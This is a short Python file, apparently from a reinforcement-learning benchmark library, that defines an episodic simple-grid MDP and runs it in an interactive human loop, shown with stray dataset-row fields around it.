size=5,
randomize_actions=False,
make_reward_stochastic=True,
lazy=0.01,
number_starting_states=1,
)
# random_loop(mdp, 50, verbose=False)
human_loop(mdp)
| 22.384615
| 82
| 0.714777
|
import gin
from colosseum.loops import human_loop
from colosseum.mdps import EpisodicMDP
from colosseum.mdps.simple_grid.simple_grid import SimpleGridMDP, SimpleGridReward
@gin.configurable
class SimpleGridEpisodic(EpisodicMDP, SimpleGridMDP):
pass
if __name__ == "__main__":
mdp = SimpleGridEpisodic(
reward_type=SimpleGridReward.AND,
seed=42,
size=5,
randomize_actions=False,
make_reward_stochastic=True,
lazy=0.01,
number_starting_states=1,
)
human_loop(mdp)
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.